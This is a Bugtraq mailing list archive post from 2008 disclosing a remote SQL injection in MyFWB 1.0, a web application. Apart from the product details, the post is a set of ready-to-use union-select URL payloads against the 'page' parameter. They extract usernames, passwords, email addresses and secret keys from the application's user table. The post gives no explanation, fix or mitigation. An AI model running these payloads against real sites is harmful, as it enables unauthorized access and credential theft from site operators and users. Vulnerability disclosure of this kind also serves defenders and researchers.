Bugtraq mailing list archives
MyFWB 1.0 Remote SQL Injection
From: Guns () 0x90 com ar
Date: Sat, 20 Sep 2008 10:10:13 -0600
MyFWB 1.0 Remote SQL Injection Author: 0x90 url: www.0x90.com.ar Product: MyFWB download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip Version: 1.0 URL: http://www.fsoft.co.nr/ Vulnerability Class: SQL Injection contact: Guns[at]0x90[dot]com[dot]ar Username: http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user Password: http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user Email: http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user Secret Key: http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
Current thread:
- MyFWB 1.0 Remote SQL Injection Guns (Sep 20)